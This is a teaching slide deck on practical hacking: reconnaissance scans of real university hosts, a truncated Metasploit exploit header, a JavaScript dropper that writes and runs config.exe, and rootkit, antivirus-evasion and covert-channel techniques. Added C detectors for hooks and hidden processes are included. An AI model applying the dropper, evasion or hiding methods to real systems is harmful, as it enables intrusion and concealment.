1 IT Architecture and Security: Practical Hacking

2 Who am I
Who is Jørgen Hjort?
Senior security consultant and CISSP at Ezenta
Has worked with IT security and software development for more than 15 years
Specialities: penetration testing, white-hat hacking, reversing, forensics, teaching, secure coding, code security reviews, software development

3 Practical hacking: contents
Concealment
Reconnaissance
Exploits / vulnerabilities
Compromise
Concealing the intrusion
Extraction of information
Consolidation of access

4 Overall process
Targeted hackers: find target machines, find exploits, hack machines
Hobby hackers, or hackers who use hacked machines as a platform (e.g. for spam or extortion): find machines, find exploits, hack machines

5 Practical hacking: concealment
Proxies
Open access points (wifi)
Anonymising networks (tor, hushmail)
Hacked computers
To avoid revealing one's point of origin, and thereby oneself, one typically goes through intermediate stations.

6 Practical hacking (concealment): proxies

7 Practical hacking (concealment): open access points

8 Practical hacking (concealment): Tor http://tor.eff.org

9 Practical hacking: reconnaissance
Public information (netcraft, google hacking, dns, ripe)
Active (nmap, nessus)
Passive (wireless sniffing)
There are several different ways of finding one's targets.

10 Practical hacking (reconnaissance): RIPE lookup
$ host www.itu.dk
www.itu.dk is an alias for tintin.itu.dk.
tintin.itu.dk has address 130.226.142.6
http://ripe.net/fcgi-bin/whois?searchtext=130.226.142.6&submit=Search:
inetnum: 130.226.0.0 - 130.226.255.255
netname: FSKNET-130-226
descr: Danish Network for Research and Education
descr: UNI-C
descr: DK-2800 Lyngby
country: DK
admin-c: unic1-ripe
tech-c: unic1-ripe
status: ASSIGNED PA
remarks: Details of IP-adresses of selected institutions are
remarks: available at http://info.net.uni-c.dk/ip.html
ITU: IT-Højskolen i København 130.226.132.0 - 130.226.133.255

11 Practical hacking (reconnaissance): DNS lookup
$ host -l itu.dk ns.itu.dk
…
videokonf.itu.dk has address 130.226.143.18
vpn.itu.dk has address 130.226.142.250
vpnpriv.itu.dk has address 130.226.142.15
webcal.itu.dk is an alias for tintin.itu.dk.
webfaktura.itu.dk is an alias for tintin.itu.dk.
webmail.itu.dk is an alias for pluto.itu.dk.
whaddayouthinkyouredoingyoubastard.itu.dk has address 130.226.142.122
wolverine.itu.dk has address 130.226.142.16
www.itu.dk is an alias for tintin.itu.dk.
www1.itu.dk has address 217.116.230.39
wwwadm.itu.dk is an alias for ssh.itu.dk.
xcvs.itu.dk has address 130.226.142.117
ypserver.itu.dk is an alias for asterix.itu.dk.
itu.dk SOA ns.itu.dk. hostmaster.itu.dk. 2005110201 28800 7200 172800 86400
$

12 Practical hacking (reconnaissance): Netcraft

13 Practical hacking (reconnaissance): Google hacking

14 Practical hacking (reconnaissance): nmap
# nmap -sS -sV test.xxx.dk
Starting nmap 3.93 ( http://www.insecure.org/nmap/ ) at 2005-11-07 01:29 CET
Interesting ports on 217.157.13.136:
(The 1662 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 3.9p1 Debian-1ubuntu2 (protocol 2.0)
25/tcp   open  smtp    Postfix smtpd
80/tcp   open  http    Apache httpd 2.0.53 ((Ubuntu) PHP/4.3.10-10ubuntu4.1)
143/tcp  open  imap    Courier Imapd (released 2004)
993/tcp  open  ssl     OpenSSL
3306/tcp open  mysql   MySQL 4.0.23_Debian-3ubuntu2.1-log
MAC Address: 00:80:AD:00:49:9E (Cnet Technology)
Service Info: Host: mail.rhave.dk
Nmap finished: 1 IP address (1 host up) scanned in 26.088 seconds

15 Practical hacking (reconnaissance): nmap ping sweep
# nmap -sP 130.226.142.0/23
Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-11-09 14:49 CET
Host 130.226.142.0 seems to be a subnet broadcast address (returned 1 extra pings).
Host 130.226.142.1 appears to be up.
Host rogue.itu.dk (130.226.142.2) appears to be up.
Host ns2.itu.dk (130.226.142.3) appears to be up.
Host tarzan.itu.dk (130.226.142.4) appears to be up.
Host superman.itu.dk (130.226.142.5) appears to be up.
Host tintin.itu.dk (130.226.142.6) appears to be up.
Host hulk.itu.dk (130.226.142.7) appears to be up.
Host hydra.itu.dk (130.226.142.8) appears to be up.
Host 130.226.142.9 appears to be up.
Host 130.226.142.10 appears to be up.
Host r2d2.linuxlab.dk (130.226.142.11) appears to be up.
Host c3po.linuxlab.dk (130.226.142.12) appears to be up.
Host nightcrawler.itu.dk (130.226.142.13) appears to be up.
Host vpnpriv.itu.dk (130.226.142.15) appears to be up.
Host wolverine.itu.dk (130.226.142.16) appears to be up.
Host pluto.itu.dk (130.226.142.18) appears to be up.
Host 130.226.142.31 appears to be up.
Host 130.226.142.96 seems to be a subnet broadcast address (returned 1 extra pings).
Host 130.226.142.97 appears to be up.

16 Practical hacking (reconnaissance): nmap ping sweep (continued)
Host dkm.itu.dk (130.226.142.100) appears to be up.
Host sigchi.itu.dk (130.226.142.101) appears to be up.
Host dialogical.itu.dk (130.226.142.103) appears to be up.
Host hug.itu.dk (130.226.142.104) appears to be up.
Host doi.itu.dk (130.226.142.105) appears to be up.
Host ds.itu.dk (130.226.142.106) appears to be up.
Host abs.itu.dk (130.226.142.108) appears to be up.
Host gamestudies.itu.dk (130.226.142.109) appears to be up.
Host hit.itu.dk (130.226.142.110) appears to be up.
Host battlefield.itu.dk (130.226.142.111) appears to be up.
Host rmj1.itu.dk (130.226.142.112) appears to be up.
Host colossus.itu.dk (130.226.142.114) appears to be up.
Host cogain.itu.dk (130.226.142.116) appears to be up.
Host xcvs.itu.dk (130.226.142.117) appears to be up.
Host bigwig.itu.dk (130.226.142.118) appears to be up.
Host tlb.itu.dk (130.226.142.119) appears to be up.
Host ea.itu.dk (130.226.142.120) appears to be up.
Host whaddayouthinkyouredoingyoubastard.itu.dk (130.226.142.122) appears to be up.
Host abacus.itu.dk (130.226.142.123) appears to be up.
Host bpl2.itu.dk (130.226.142.125) appears to be up.
Host lacomoco.itu.dk (130.226.142.130) appears to be up.
Host intifada.itu.dk (130.226.142.131) appears to be up.
Host logosphere.itu.dk (130.226.142.132) appears to be up.
Nmap run completed -- 512 IP addresses (41 hosts up) scanned in 48.905 seconds

17 Practical hacking: exploits / vulnerabilities
Sources of exploits
Public sites / mailing lists (frsirt.com, securityfocus.com, full-disclosure, secunia.dk)
Own development (hard work)

18 Practical hacking (exploits): public websites

19 Practical hacking (exploits): finding vulnerabilities yourself
There are a number of methods for finding vulnerabilities in programs:
Source code auditing
Binary auditing
Fuzzing

20 Practical hacking (exploits): finding vulnerabilities yourself (stack frame diagram: ret, ebp (esp)..., var_28)

21 Practical hacking: compromise
Direct attacks: firewalls, IDS (and IPS)
Indirect attacks against client vulnerabilities (e.g. IE exploits): personal firewalls that block outgoing traffic, antivirus (pattern recognition => change the pattern)

22 Practical hacking (compromise): firewalls
Firewalls are a mature technology that is very good at doing its job. On the rare occasions that something is found in modern products, it is mainly DoS attacks.
DoS attacks
Fragment attacks
Flood attacks
It can typically be necessary to use other attack methods (e.g. indirect attacks) if proper firewalls block the direct route.

23 Practical hacking (compromise): Intrusion Detection Systems (IDS)
The problem with IDS is detection, but fortunately IDS is typically pattern-based and can therefore be bypassed.
Modifying known exploits can let them pass through undetected
Fragmentation can fool an IDS
Bugs in the IDS can lead to a crash: send 'disable' packets before the real attack

24 Practical hacking (compromise): Snort
Advisory ID : FrSIRT/ADV-2005-2138
CVE ID : CVE-2005-3252
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2005-10-18
Technical Description
A vulnerability has been identified in Snort, which could be exploited by remote attackers to execute arbitrary commands. This flaw is due to a stack overflow error in the Back Orifice pre-processor when determining the direction (to or from server) of a specially crafted UDP packet, which could be exploited by remote unauthenticated attackers to compromise a vulnerable system or network monitored by Snort.
Affected Products
Snort versions 2.4.0 through 2.4.2

25 Practical hacking (compromise): Snort
Snort Back Orifice Pre-processor Remote Buffer Overflow Exploit (Win32)
Date : 25/10/2005
Advisory : FrSIRT/ADV-2005-2138
Rated as : Critical
###############################################
# for educational purpose only
# by Kira
###############################################
package Msf::Exploit::snort_bo_overflow_win32;
use base 'Msf::Exploit';
use strict;
use Pex::Text;
my $holdrand;
my $advanced = {};
my $info = {
  'Name' => 'Snort Back Orifice Preprocessor Overflow',
  'Version' => '$Revision: 1.0 $',
  'Authors' => [ 'Trirat Puttaraksa (Kira) ', ],
  'OS' => ['win32', 'win2000', 'winxp', 'win2003'],
.........

26 Practical hacking (compromise): personal firewalls
Typically smaller software firewalls that protect only a single machine
Also protect against outgoing traffic
Mainly used only on Windows machines, which makes it easier to get data out of Linux/Unix/BSD machines
Several ways of bypassing these:
Piggybacking on permitted programs
Sending data from low network layers (NDIS)

27 Practical hacking (compromise): ZoneAlarm
ZoneAlarm Personal Firewall Program Control Feature Bypass
Secunia Advisory: SA17450
Release Date: 2005-11-09
Critical: Not critical
Impact: Security Bypass
Where: Local system
Solution Status: Unpatched
Software: ZoneAlarm Anti-Spyware 6.x, ZoneAlarm Antivirus 6.x, ZoneAlarm Internet Security Suite 6.x, ZoneAlarm Pro 6.x
Description: Debasis Mohanty has discovered a weakness in various ZoneAlarm products, which can be exploited to bypass security features provided by the product. The weakness is caused due to the Program Control feature failing to correctly identify and stop processes that use the Internet Explorer browser to make outgoing connections via the "ShowHTMLDialog()" API in MSHTML.DLL. This may be exploited by malware to send potentially sensitive information out from an affected system.
…

28 Practical hacking (compromise): antivirus
Antivirus programs typically check file access, but fortunately they typically rely on pattern recognition. Even small variations can fool many AV products.

29-30 Practical hacking (compromise): example of an AV pattern (the same sample is shown on slides 29 and 30)
<APPLET code="com.ms.activeX.ActiveXComponent" WIDTH=0 HEIGHT=0>
<!-- hide for safe browsers
InterfaceObject=document.applets[0];
setTimeout("ownload()",5000);
function ownload() {
  fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";
  InterfaceObject.setCLSID(fsoClassID);
  fso = InterfaceObject.createInstance();
  windir = fso.getspecialfolder(0);
  filename = "\\config.exe";
  if (fso.FileExists(windir+filename) == false) {
    file = fso.opentextfile(windir+filename, "2", "TRUE")
    file.write(FileContent)
    file.close()
    setTimeout("Run()",500)
  }
…

31 Practical hacking: rootkits
After a compromise one typically needs a base on the hacked machine from which to carry out the further work. A rootkit is typically used for this. Basically it is just a technology whose purpose is to hide an attacker's tools.
Examples: FU_rootkit (Windows, rootkit.com), t0rn (Linux)

32 Practical hacking (rootkits): concealing the intrusion
Rootkits are used, among other things, to hide:
files / folders
network connections
processes
log entries

33 Operating system design
Intel has 4 privilege levels or "rings"
Windows and most other OSes use only 2 rings (0 and 3)

34 Operating system design
By using only two privilege levels there is no separation between the kernel itself and third-party drivers and LKMs
Drivers can modify the memory associated with kernel objects, such as process tokens, etc.

35 Operating system design
User land: the operating system provides a common API for developers to use (Kernel32.dll, Ntdll.dll)
Kernel mode: the low-level kernel functions that implement the services needed in user land; protected memory containing objects such as those for processes, tokens, ports, etc.

36 Windows architecture (diagram)
User mode: system processes (Session Manager, Winlogon, Services.exe, LSASS), services, applications (Explorer, Task Manager, Service Control Manager, user applications); NTDLL.DLL, where user-mode rootkits hook
Kernel mode: kernel-mode callable interfaces; I/O Manager, Security Reference Monitor, Processes & Threads, Config Manager (registry); device & file system drivers; Kernel, where kernel-mode rootkits hook; Hardware Abstraction Layer
Hardware

37 Windows user-land rootkits: remote code injection
Remote thread injection
The maximum size of a remote thread is 4 KB (the default size of a page of virtual memory)
A way of copying code into another process's address space and then getting it executed in the context of that process
It involves the use of remote threads and the WriteProcessMemory API
The code is copied via WriteProcessMemory, and its execution is started with CreateRemoteThread

38 Windows user-land rootkits: remote code injection
What is an IAT table?
PE (Portable Executable) format
A global table containing a list of all function pointers for every function mapped into the running process
This table is unique per process

39 Windows user-land rootkits: remote code injection
What is "function hooking"?
Redirecting a pointer to one's own malicious function. Also called "function proxying"
Two forms of "function proxying":
Pointer patching (easily detected)
Detour patching (harder to detect)

40 Rootkit pointer patching
Operating systems use global tables to keep track of all functions available from within a process
By modifying one of these pointers to point at one's own "proxy" function, one can intercept requests and parse results

41 Rootkit detour patching
What is detour patching?
By directly modifying the first few bytes (7) after the function start in memory, one can introduce a "detour"
Detour: FAR JMP 0xDEADBEAF
Where 0xDEADBEAF is a 4-byte pointer to one's malicious proxy function
Total patch size: 7 bytes

42 Detours
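A defender's check for the 7-byte detour described on slides 41-42, added here as an example (it is not code from the slides). It classifies the first bytes of a function entry as found in memory and compares them with a trusted copy; the byte samples are constructed, and classify_prologue, hook_target and prologue_diff are hypothetical names.

```c
/* Added example: detect a detour patch (slides 41-42) at a function entry.
 * Works on a copy of the function's first bytes; no live process access. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

typedef enum {
    HOOK_NONE = 0,
    HOOK_FAR_JMP,   /* EA imm32 imm16 : the 7-byte FAR JMP from slide 41 */
    HOOK_REL_JMP,   /* E9 rel32       : 5-byte relative jump             */
    HOOK_IND_JMP,   /* FF 25 disp32   : 6-byte jump through a pointer    */
    HOOK_PUSH_RET   /* 68 imm32 C3    : 6-byte push/ret trampoline       */
} hook_kind;

/* Classify the bytes at a function entry. A healthy x86 prologue starts
 * with push ebp; mov ebp,esp (55 8B EC) as on slide 54, never with a jump. */
hook_kind classify_prologue(const uint8_t *code, size_t len)
{
    if (len >= 7 && code[0] == 0xEA) return HOOK_FAR_JMP;
    if (len >= 5 && code[0] == 0xE9) return HOOK_REL_JMP;
    if (len >= 6 && code[0] == 0xFF && code[1] == 0x25) return HOOK_IND_JMP;
    if (len >= 6 && code[0] == 0x68 && code[5] == 0xC3) return HOOK_PUSH_RET;
    return HOOK_NONE;
}

/* Little-endian 32-bit read, independent of the host's byte order. */
static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* For the absolute forms, extract the 32-bit target so the analyst can see
 * which module the detour lands in. Returns 0 when there is no absolute target
 * (a rel32 jump needs the site address to resolve). */
uint32_t hook_target(const uint8_t *code, size_t len)
{
    switch (classify_prologue(code, len)) {
    case HOOK_FAR_JMP:  return le32(code + 1);   /* offset comes before the selector */
    case HOOK_IND_JMP:  return le32(code + 2);   /* address of the pointer slot       */
    case HOOK_PUSH_RET: return le32(code + 1);
    default:            return 0;
    }
}

/* Opcode-independent second check: compare the bytes in memory with a trusted
 * copy (e.g. the on-disk image). Returns how many of the first n bytes differ;
 * any nonzero value at an exported API entry is suspicious. */
size_t prologue_diff(const uint8_t *in_memory, const uint8_t *trusted, size_t n)
{
    size_t d = 0;
    for (size_t i = 0; i < n; i++) d += (in_memory[i] != trusted[i]);
    return d;
}

/* Constructed samples (not taken from any real binary): a slide-54 style
 * prologue, and the same bytes after a 7-byte FAR JMP 0008:0xDEADBEAF patch. */
static const uint8_t CLEAN[8]  = {0x55, 0x8B, 0xEC, 0x33, 0xC0, 0x50, 0x90, 0x90};
static const uint8_t HOOKED[8] = {0xEA, 0xAF, 0xBE, 0xAD, 0xDE, 0x08, 0x00, 0x90};

int main(void)
{
    printf("clean : kind=%d diff=%zu\n", (int)classify_prologue(CLEAN, 8),
           prologue_diff(CLEAN, CLEAN, 7));
    printf("hooked: kind=%d target=0x%08X diff=%zu\n", (int)classify_prologue(HOOKED, 8),
           hook_target(HOOKED, 8), prologue_diff(HOOKED, CLEAN, 7));
    return 0;
}
```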

43 Windows kernel-land rootkits
Kernel-land rootkits: a malicious kernel driver
Most of the functions one wants to monitor or modify are directly accessible in kernel land
The functions are found in the SSDT (System Service Descriptor Table)
Resembles the user-land IAT table

44 Windows kernel-land rootkits
Kernel-land rootkits: a malicious kernel driver "hooks" an exported kernel API function in order to monitor results
Detour patching of kernel API functions
Hooking interrupts

45 Linux rootkits: history
User-land: SSHEater-1.1 by Carlos Barros
Kernel-land: Static-X's Adore-NG 2.4/2.6 kernel rootkit; Rebel's phalanx (patches /dev/mem) rebel@blacksecurity.org

46 Practical hacking (rootkits): t0rn
"The t0rn rootkit replaces several binaries on the system in order to hide itself. Here are the binaries that it replaces: du find ifconfig in.telnetd in.fingerd login ls mjy netstat ps pstree top. A setuid shell is placed in /usr/man/man1/man1/lib/.lib/.x"

47 Mac OS X rootkits: history
Still in early stages of research
Nemo released WeaponX as an original proof-of-concept
Mac responded by hardening their O/S internals
Nemo responded (like any self-respecting blackhat) with his own improved rootkit

48 Hiding processes - Windows (diagram)
KPRCB { *CurrentThread, *NextThread, *IdleThread } -> ETHREAD { KTHREAD { ApcState } } -> EPROCESS { KPROCESS, LIST_ENTRY { FLINK, BLINK } } <-> EPROCESS { KPROCESS, LIST_ENTRY { FLINK, BLINK } } <-> EPROCESS { KPROCESS, LIST_ENTRY { FLINK, BLINK } }

49 Hiding processes - Windows
Locate the Processor Control Block (KPRCB)
Located at 0xffdff120
The fs register in kernel mode points to 0xffdff000
Within the KPRCB is a pointer to the Current Thread block (ETHREAD)
Located at fs:[124] or 0xffdff124
An ETHREAD contains a KTHREAD structure

50 Hiding processes - Windows
The KTHREAD structure contains a pointer to the EPROCESS block of the current process
The EPROCESS block contains a LIST structure, which has a forward and a backward pointer to active processes
This creates the doubly linked list of active processes in Windows

51 Hiding processes - Windows
To hide a process:
Locate the EPROCESS block of the process to hide
Change the process behind it to point to the process after the process you are hiding
Change the process after it to point to the process before the one you are trying to hide
Essentially, the list of active processes now points "around" the hidden process

52 Hiding Processes - Windows
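The cross-view check that catches the unlinking described on slides 48-51, as an added toy model (not code from the slides and not a real kernel structure). It keeps two views of the same processes: a doubly linked list standing in for EPROCESS's ActiveProcessLinks, which process listers walk, and a PID table standing in for the table the scheduler and handle lookups use; a process unlinked from the list still appears in the table, and the difference is the detection. All names (create_process, dkom_unlink, cross_view_hidden, demo_run) are hypothetical.

```c
/* Added example: toy model of DKOM process hiding (slides 48-51) and the
 * cross-view detection that reveals it. Nothing here touches a real kernel. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define MAX_PROCS 8

typedef struct proc {
    uint32_t pid;
    struct proc *flink, *blink;          /* LIST_ENTRY { FLINK, BLINK } */
} proc;

static proc list_head = { 0, &list_head, &list_head };
static proc *pid_table[MAX_PROCS];       /* second, independent view     */

/* Register a process object in both views (tail insert into the list).
 * Toy table: pids must be distinct modulo MAX_PROCS. */
proc *create_process(proc *p, uint32_t pid)
{
    p->pid = pid;
    p->blink = list_head.blink;
    p->flink = &list_head;
    list_head.blink->flink = p;
    list_head.blink = p;
    pid_table[pid % MAX_PROCS] = p;
    return p;
}

/* Slide 51: the neighbours are made to point around p. p keeps its own
 * links, so it still runs; it merely stops appearing in list walks. */
void dkom_unlink(proc *p)
{
    p->blink->flink = p->flink;
    p->flink->blink = p->blink;
}

/* View 1: walk the active-process list. Returns the number of pids written. */
size_t list_pids(uint32_t *out, size_t max)
{
    size_t n = 0;
    for (proc *p = list_head.flink; p != &list_head && n < max; p = p->flink)
        out[n++] = p->pid;
    return n;
}

/* Cross-view detection: a pid present in the table but missing from the
 * list walk is reported as hidden. Returns the number of hidden pids. */
size_t cross_view_hidden(uint32_t *hidden, size_t max)
{
    uint32_t seen[MAX_PROCS];
    size_t nseen = list_pids(seen, MAX_PROCS), nh = 0;
    for (int i = 0; i < MAX_PROCS && nh < max; i++) {
        if (!pid_table[i]) continue;
        int found = 0;
        for (size_t j = 0; j < nseen; j++) found |= (seen[j] == pid_table[i]->pid);
        if (!found) hidden[nh++] = pid_table[i]->pid;
    }
    return nh;
}

/* Constructed scenario: three processes (pids 4, 5, 6); pid 5 is unlinked.
 * Call once: it builds the list, hides pid 5, and returns the hidden count. */
static proc slots[3];
static uint32_t hidden_pids[MAX_PROCS];

size_t demo_run(void)
{
    create_process(&slots[0], 4);
    create_process(&slots[1], 5);
    create_process(&slots[2], 6);
    dkom_unlink(&slots[1]);
    size_t n = cross_view_hidden(hidden_pids, MAX_PROCS);
    printf("table reveals %zu hidden process(es), first pid %u\n", n, n ? hidden_pids[0] : 0);
    return n;
}

uint32_t demo_hidden_pid(size_t i) { return hidden_pids[i]; }
size_t demo_visible_count(void) { uint32_t v[MAX_PROCS]; return list_pids(v, MAX_PROCS); }

int main(void) { return demo_run() == 1 ? 0 : 1; }
```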

53 Control flow - places to hook (diagram)
User land: Kernel32 CreateFileW -> NTDLL NtCreateFile -> Kernel

54 Control flow - places to hook (diagram)
User land -> Kernel: IDT 2E -> System call table -> &NtCreateFile -> NtCreateFile { push ebp; mov ebp, esp; xor eax, eax; push eax; … }

55 Practical hacking (rootkits): Sony rootkit
"I studied the driver's initialization function, confirmed that it patches several functions via the system call table and saw that its cloaking code hides any file, directory, Registry key or process whose name begins with "$sys$"." - Mark's Sysinternals Blog (www.sysinternals.com)

56 2nd generation rootkits: hardware
Interrupt
Split TLB
Memory cloaking
Pioneered by Greg Hoglund and Jamie Butler


58 Faking reads / writes by exploiting the split TLB (1)
Normal: synchronized ITLB and DTLB translate code and data memory accesses to the same physical frame.
(Figure: a memory access to VPN 12 is classified as a code access or a data access; both the ITLB and the DTLB map VPN 12 to frame 2; a miss goes to the page table / page directory, and an invalid entry such as 27 faults. Other frames shown: 8, 52.)

59 Faking reads / writes by exploiting the split TLB (2)
Desynchronized: the ITLB and DTLB translate code and data memory accesses to different physical frames.
(Figure: for the same VPN 12, the ITLB entry points to frame 52, which holds the rootkit code, while the DTLB entry points to frame 2, which holds random garbage; a code fetch and a data read of the same virtual page therefore see different contents. A miss still goes to the page table / page directory, and an invalid entry such as 27 faults. Other frame shown: 8.)

60 3rd generation rootkits: hardware virtualization (hypervisor)
Pioneered by Joanna Rutkowska and Alexander Tereshkin

61 The heart of SVM: the VMRUN instruction

62 Blue Pill: the idea behind it (© Invisible Things Lab, 2007)
Uses the AMD SVM extensions to move the operating system into a virtual machine (on-the-fly)
Uses a thin hypervisor to control the OS
The hypervisor is responsible for controlling "interesting" events inside the guest OS

63 SVM (© Invisible Things Lab, 2007)
SVM is a set of instructions that can be used to implement Secure Virtual Machines on AMD
MSR EFER register: bit 12 (SVME) controls whether SVM mode is enabled or not
EFER.SVME must be set to 1 before executing an SVM instruction.
Reference: AMD64 Architecture Programmer's Manual Vol. 2: System Programming Rev 3.11 http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/24593.pdf

64 Blue Pill idea (simplified)

65 BP installs itself on-the-fly (© Invisible Things Lab, 2007)
The main idea behind BP is that it installs itself on-the-fly
So no modification of the BIOS, boot sector or system files is necessary
By default BP does not survive a system reboot

66 4th generation rootkits: Intel System Management Mode (SMM), 2008 -

67 4th generation rootkits
They hide themselves in the SMM area
SMM is more privileged than a hypervisor and cannot be controlled by an operating system. Operating systems cannot override or disable System Management Interrupt (SMI) calls

68 4th generation rootkits
In practice one can only know what runs in the SMM area by physically disassembling the firmware in the computer.

69 €45

70 Practical hacking (rootkits): extraction of information
Documents
Logs
Saved passwords
Mails
…

71 Simple data extraction
Remote shell: a TCP session connected to the native command interpreter on the system (Windows: cmd.exe; UNIX: /bin/sh or /bin/bash)
PRO: Simple
CON: Data is sent "in the clear"

72 "Out of the box" extraction
Use an existing solution. Example: Back Orifice 2000
PROS: Fully featured; no programming skills required (attractive for the script kiddies)
CONS: May be overkill (i.e. large footprint); easily detectable by AV / IDS systems; not extensible or customizable

73 We need a stealthier way
Definition: covert channel: "A covert channel is a communication channel that allows a process to transfer information in a manner that violates the system's security policy". [DOD_1985], [NCSC_1993], [Rowland_1996].

74 Covert channels
Network-based covert channels: designed for extraction of data across networks; can be passive or active channels
Host-based covert channels: designed for hidden data extraction and communication between processes on a local system

75 Passive covert channels
Passive channels: passive covert channels don't generate new packets. They exploit another protocol architecture to steganographically embed the channel data
PRO: Does not generate suspicious network traffic
CON: Depends on how much traffic already flows, and on how much information can be packed into a given protocol

76 Steganography
Definition: steganography: "The art and science of hiding information by embedding messages within other, seemingly harmless messages. Steganography works by replacing bits of useless or unused data in regular computer files (such as graphics, sound, text, HTML, or even floppy disks) with bits of different, invisible information. This hidden information can be plain text, cipher text, or even images."

77 Active covert channels (www.komoku.com)
Active channels: generate new traffic instead of piggybacking on existing traffic
PRO: More bandwidth than passive channels
CON: More likely to trigger a NIDS
Do not send extracted data "in the clear"
Need to "blend in" with existing network traffic

78 A simple but practical example
Barnaby Jack at eEye describes a kernel-level key-logger that can return the captured keystrokes covertly to a remote user
Replaced the keyboard interrupt handler with a scancode capture routine
Patches the ICMP handler in TCPIP.SYS

79 Patching the TCP.sys ICMP handler
How does ICMP work?
The client computer brews up an ICMP Echo Request packet and sends it to the target computer.
The target machine, upon receipt of the ICMP Echo Request, builds a corresponding ICMP Echo Reply packet and sends it back to the client computer.
Exploiting ICMP
We can overwrite the ICMP Echo Response handler to replace the buffer with a pointer to a buffer containing captured keystrokes
Sending an ICMP Echo Request to the remote system will now return the captured keystrokes in the ICMP Echo Response packet
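A network-side detector for the covert channel on slides 78-79, added as an example that is not part of the slides. An Echo Reply must carry back the request's identifier, sequence number and data unchanged, so a reply whose data no longer matches the outstanding request is the signal that the handler has been patched. The ICMP messages are constructed inline (no IP header, checksums left zero), and parse_icmp_echo and check_echo_pair are hypothetical names.

```c
/* Added example: flag ICMP Echo Replies whose payload was substituted
 * (slides 78-79). Input is the ICMP message only, as bytes off the wire. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define ICMP_ECHO_REPLY 0
#define ICMP_ECHO_REQ   8

typedef struct {
    uint8_t  type, code;
    uint16_t checksum;        /* carried but not verified in this example */
    uint16_t id, seq;         /* big-endian on the wire */
    const uint8_t *data;
    size_t datalen;
} icmp_msg;

/* Parse an ICMP echo request/reply. Returns 0 on success, -1 if the
 * message is truncated or is not an echo message. */
int parse_icmp_echo(const uint8_t *buf, size_t len, icmp_msg *m)
{
    if (len < 8) return -1;
    m->type = buf[0]; m->code = buf[1];
    if (m->type != ICMP_ECHO_REQ && m->type != ICMP_ECHO_REPLY) return -1;
    m->checksum = (uint16_t)(buf[2] << 8 | buf[3]);
    m->id  = (uint16_t)(buf[4] << 8 | buf[5]);
    m->seq = (uint16_t)(buf[6] << 8 | buf[7]);
    m->data = buf + 8; m->datalen = len - 8;
    return 0;
}

/* Verdict for a request/reply pair:
 *   0 = faithful echo (same id/seq, identical data)
 *   1 = payload substituted (same id/seq, but data or length differs)
 *   2 = the reply does not belong to this request (or is malformed) */
int check_echo_pair(const uint8_t *req, size_t reqlen,
                    const uint8_t *rep, size_t replen)
{
    icmp_msg q, r;
    if (parse_icmp_echo(req, reqlen, &q) || q.type != ICMP_ECHO_REQ) return 2;
    if (parse_icmp_echo(rep, replen, &r) || r.type != ICMP_ECHO_REPLY) return 2;
    if (q.id != r.id || q.seq != r.seq) return 2;
    if (q.datalen != r.datalen) return 1;
    return memcmp(q.data, r.data, q.datalen) == 0 ? 0 : 1;
}

/* Constructed samples (not real captures): id 0x1234, seq 1, 8 data bytes.
 * GOOD echoes the request; BAD carries keystroke-like text in the same slot,
 * imitating the patched handler; OTHER answers a different sequence number. */
static const uint8_t REQ[]   = {8,0,0,0, 0x12,0x34, 0x00,0x01, 'a','b','c','d','e','f','g','h'};
static const uint8_t GOOD[]  = {0,0,0,0, 0x12,0x34, 0x00,0x01, 'a','b','c','d','e','f','g','h'};
static const uint8_t BAD[]   = {0,0,0,0, 0x12,0x34, 0x00,0x01, 'p','a','s','s','w','o','r','d'};
static const uint8_t OTHER[] = {0,0,0,0, 0x12,0x34, 0x00,0x02, 'a','b','c','d','e','f','g','h'};

int main(void)
{
    printf("honest reply : verdict %d\n", check_echo_pair(REQ, sizeof REQ, GOOD, sizeof GOOD));
    printf("patched reply: verdict %d\n", check_echo_pair(REQ, sizeof REQ, BAD, sizeof BAD));
    printf("unrelated    : verdict %d\n", check_echo_pair(REQ, sizeof REQ, OTHER, sizeof OTHER));
    return 0;
}
```

In a real deployment the check runs per outstanding request keyed on (source, id, seq), which also makes replies that arrive without any request stand out.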

80 DNS
My own favourite: DNS
Have used it several times in the real world

81 Practical hacking (rootkits): consolidation of access
Installation of backdoors
Rootkits

82 Practical hacking (rootkits): further use of the machines
Spam / open relays
Proxy
DDoS
Distributed computations

83 Practical hacking: example of a botnet
Phpbb include vuln scanning, via Google, generating new IRC botnet (NEW)
Published: 2005-11-10, Last Updated: 2005-11-10 01:24:27 UTC by Patrick Nolan (Version: 3)
We have received two reports of systems being exploited via a phpbb include vulnerability and a "new" IRC bot is installed. Please update your files now. Phpbb forum support guru "Techie-Micheal" points out that "running update_to_latest.php on their install only updates the database (and is clearly stated in the documentation), files need to be updated separately for which there are several methods". The scanning is for phpbb versions 2.0.10 and under. The latest version of phpbb is 2.0.18. Micheal also notes "- In past bots, the bots would run as an "SSL'ed Apache. This one is a bit different; my $processo = '/usr/local/firewall'". The new IRC bot scans for vulnerable systems using Google, when successful it announces that "oopz and sirh0t and Aleks g0t pwned u!", and has UDP flooding and UDP/ICMP/TCP scanning capabilities.

84 Practical hacking: variations
Hacking via physical access
Social engineering
USB keys
Case story: internet shop, dual-homed server (two or more network cards)

85 And then… on to group work
